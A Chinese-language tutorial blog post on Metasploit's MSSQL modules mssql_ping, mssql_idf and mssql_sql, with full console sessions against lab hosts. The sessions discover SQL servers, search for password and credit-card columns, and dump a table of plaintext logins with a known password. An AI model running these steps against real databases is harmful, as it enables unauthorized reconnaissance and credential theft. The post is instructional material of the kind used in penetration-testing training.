Metasploit 辅助模块:扫描器 MSSQL

mssql_ping

该“mssql_ping”模块查询UDP端口1434上的主机的主机或范围,以确定任何MSSQL服务器的监听TCP端口,如果有的话。MSSQL随机化它监听的TCP端口,所以这是Metasploit框架中非常有价值的模块。

msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target address range or CIDR identifier
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

 

要配置模块,我们设置RHOSTS和THREADS值,并让它对我们的目标运行。

msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > run

[*] Scanned 13 of 55 hosts (023% complete)
[*] Scanned 16 of 55 hosts (029% complete)
[*] Scanned 17 of 55 hosts (030% complete)
[*] SQL Server information for 192.168.1.217:
[*]    tcp             = 27900
[*]    np              = \\SERVER2\pipe\sql\query
[*]    Version         = 8.00.194
[*]    InstanceName    = MSSQLSERVER
[*]    IsClustered     = No
[*]    ServerName      = SERVER2
[*] SQL Server information for 192.168.1.241:
[*]    tcp             = 1433
[*]    np              = \\2k3\pipe\sql\query
[*]    Version         = 8.00.194
[*]    InstanceName    = MSSQLSERVER
[*]    IsClustered     = No
[*]    ServerName      = 2k3
[*] Scanned 32 of 55 hosts (058% complete)
[*] Scanned 40 of 55 hosts (072% complete)
[*] Scanned 44 of 55 hosts (080% complete)
[*] Scanned 45 of 55 hosts (081% complete)
[*] Scanned 46 of 55 hosts (083% complete)
[*] Scanned 50 of 55 hosts (090% complete)
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) >

从模块输出中可以看出,它不仅返回侦听的TCP端口,还返回其他有价值的信息,例如InstanceName和ServerName值。

 

mssql_idf

该“mssql_idf”(有趣的数据搜索)模块将使用一组给定的凭据连接到远程服务器MSSQL和搜索行和列“有趣”的名字。这些信息可以帮助您调整对数据库的进一步攻击。

msf > use auxiliary/admin/mssql/mssql_idf
msf auxiliary(mssql_idf) > show options

Module options (auxiliary/admin/mssql/mssql_idf):

   Name      Current Setting         Required  Description
   ----      ---------------         --------  -----------
   NAMES     passw|bank|credit|card  yes       Pipe separated list of column names
   PASSWORD                          no        The password for the specified username
   RHOST                             yes       The target address
   RPORT     1433                    yes       The target port
   USERNAME  sa                      no        The username to authenticate as

 

要配置模块,我们将它设置为查找“用户名”和“密码”的字段名称,以及系统的已知密码和我们的RHOST值。

msf auxiliary(mssql_idf) > set NAMES username|password
NAMES => username|password
msf auxiliary(mssql_idf) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_idf) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_idf) > run


Database Schema Table          Column                Data Type Row Count 

======== ====== ============== ===================== ========= ========= ======== ====== ============== ===================== ========= ========= 

msdb     dbo    sysmail_server username              nvarchar  0

msdb     dbo    backupmediaset is_password_protected bit       0

msdb     dbo    backupset      is_password_protected bit       0

logins   dbo    userpass       username              varchar   3

logins   dbo    userpass       password              varchar   3


[*] Auxiliary module execution completed
msf auxiliary(mssql_idf) >

从模块输出中可以看到,扫描器通过包含用户名和密码列的'userpass'表找到我们的'登录'数据库。

 

mssql_sql

该“mssql_sql”模块允许您使用已知良好的凭据对数据库执行SQL查询。

msf > use auxiliary/admin/mssql/mssql_sql
msf auxiliary(mssql_sql) > show options

Module options (auxiliary/admin/mssql/mssql_sql):

   Name                 Current Setting   Required  Description
   ----                 ---------------   --------  -----------
   PASSWORD                               no        The password for the specified username
   RHOST                                  yes       The target address
   RPORT                1433              yes       The target port (TCP)
   SQL                  select @@version  no        The SQL query to execute
   TDSENCRYPTION        false             yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa                no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false             yes       Use windows authentification (requires DOMAIN option set)

 

为了配置这个模块,我们设置了PASSWORD和RHOST值,然后设置了我们想要的SQL命令,并让它运行。

msf auxiliary(mssql_sql) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_sql) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_sql) > set SQL use logins;select * from userpass
SQL => use logins;select * from userpass
msf auxiliary(mssql_sql) > run

[*] SQL Query: use logins;select * from userpass
[*] Row Count: 3 (Status: 16 Command: 193)



 userid  username  password
 ------  --------  --------
 1       bjohnson  password
 2       aadams    s3cr3t
 3       jsmith    htimsj

[*] Auxiliary module execution completed
msf auxiliary(mssql_sql) >

 

 

mssql

    A+
发布日期:2018年06月19日 20:58:14  所属分类:Metasploit
最后更新时间:2018-06-20 15:22:20
付杰
C++语言基础到进阶篇
  • ¥ 498.0元
  • 市场价:598.0元
购买
详情
花牛苹果 甘肃天水 李宏恩家自种 1斤 包邮
  • ¥ 6.8元
  • 市场价:8.8元
购买
详情
wp dz 帝国 dede phpcms等快速建站服务
  • ¥ 999元
  • 市场价:4999元
购买
详情
Entity Framework Core项目实战快速入门视频
  • ¥ 68.0元
  • 市场价:98.0元
购买
详情

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: